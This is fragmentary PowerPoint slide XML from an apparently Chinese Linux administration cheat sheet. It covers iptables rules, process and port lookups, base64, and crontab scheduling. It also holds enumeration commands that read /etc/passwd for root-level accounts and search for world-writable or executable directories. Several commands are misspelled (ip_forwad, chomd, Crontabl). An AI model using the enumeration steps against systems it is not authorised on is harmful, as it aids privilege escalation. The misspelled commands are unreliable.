              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>icmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>-type 8 -s 0/0 -j DROP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-t </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>nat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> -A PREROUTING -p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>dport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> 80 -j REDIRECT --to-ports 8080 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>本机端口转发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-A INPUT -p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>dport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> 80 -m limit --limit 25/minute --limit-burst 100 -j ACCEPT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>限制连接</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>-F </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>清空规则链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-A OUTPUT -o eth0 -p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> -d 192.168.100.0/24 --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>dport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> 22 -m state --state NEW,ESTABLISHED -j ACCEPT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>iptables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> -A INPUT -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> eth0 -p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> --sport 22 -m state --state ESTABLISHED -j ACCEPT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16694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92" y="1232612"/>
            <a:ext cx="8754615" cy="26641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15104" y="4100707"/>
            <a:ext cx="21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system enable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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080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Linux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常用命令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60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6727" y="1289040"/>
            <a:ext cx="7977673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fuser -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>nv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en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> 80 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>查看进程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>pid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fuser -k -n </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> 80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lsof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>i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echo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>1 &gt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>proc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/sys/net/ipv4/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ip_forwad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zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>路由转发开启</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>关闭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find -type f -name \*.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>mtime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> -2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find -type f -name \*.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> -exec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>chomd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> 644 {} \;</a:t>
            </a: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uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> –a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>查看内核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cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Rpm –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>qa</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="14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err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>pgrep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> -l </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>进程名来</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>找</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" smtClean="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>pid</a:t>
            </a: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echo “test” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>| </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" smtClean="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>base64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echo "ZnVjawo=" | base64 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" smtClean="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>–d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grep -i </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" smtClean="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>user filename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grep 80 /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" smtClean="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>etc/services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" smtClean="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>awk </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>-F: '($3 == "0") {print}' /etc/passwd </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="140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find / -writable -type d 2&gt;/dev/null </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" smtClean="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" smtClean="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>查找可写目录</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="140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cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>find / \( -perm -o w -perm -o x \) -type d 2&gt;/dev/null </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" smtClean="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>可写可执行目录</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="140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837" y="1986229"/>
            <a:ext cx="4009524" cy="483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333" y="4884837"/>
            <a:ext cx="1666667" cy="1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linux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crontab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61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1517" y="1972787"/>
            <a:ext cx="6096000" cy="41088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1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>、服务启动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service </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>cron</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> start/stop/reload/restart</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN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2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>、直接用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>crontab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>命令编辑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Crontab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> [-u username] [-1|-e|-r]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Crontab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> –u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>只用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>智能执行这个任务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Crontab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> –e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>编辑内容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Crontab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> –l </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>查看任务</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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Crontabl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> –r </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>移除工作内容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642" y="3545686"/>
            <a:ext cx="4724809" cy="20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0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latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Crontab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实例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62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6996" y="1484655"/>
            <a:ext cx="7949682" cy="4298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cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>每晚的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>21:30</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>重启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sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>30 21 * * * /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/local/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>etc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rc.d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r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> restart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cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>表示每周六、周日的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>1 : 10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>重启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r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a: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sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>0,30 18-23 * * * /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/local/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>etc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rc.d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r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> restart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cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>每一小时重启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sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>*/1 * * * /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/local/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>etc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rc.d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r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> restart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11</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>点到早上</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>点之间，每隔一小时重启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50000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>23-7/1 * * * /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/local/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>etc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rc.d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r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> restart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cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>每月的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
